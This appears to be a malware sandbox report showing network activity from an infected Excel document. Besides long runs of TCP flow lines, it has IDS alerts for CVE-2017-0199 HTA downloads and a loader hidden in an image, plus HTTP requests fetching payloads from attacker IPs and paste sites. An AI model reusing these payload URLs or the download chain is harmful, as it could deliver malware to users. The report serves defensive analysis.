            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 23.95.235.29:80
            Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49162
            Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49164
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49168
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49174
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.63.94.214 443
            Source: C:\Windows\System32\wscript.exeDomain query: paste.rs
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: paste.ee
            Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
            Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
            Source: Joe Sandbox ViewIP Address: 54.150.207.131 54.150.207.131
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 23.95.235.29:80
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 23.95.235.29:80
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 23.95.235.29:80
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ACRWC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ACRWC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14551-628f814321468"
            Source: global trafficHTTP traffic detected: GET /808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 11 Dec 2024 05:43:36 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14551-628f814321468"
            Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49168 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A7018 URLDownloadToFileW,8_2_000007FE899A7018
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\325DEE15.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ACRWC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ACRWC HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.rsConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14551-628f814321468"
            Source: global trafficHTTP traffic detected: GET /808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 11 Dec 2024 05:43:36 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14551-628f814321468"
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: short.ruksk.com
            Source: global trafficDNS traffic detected: DNS query: paste.rs
            Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
            Source: global trafficDNS traffic detected: DNS query: paste.ee
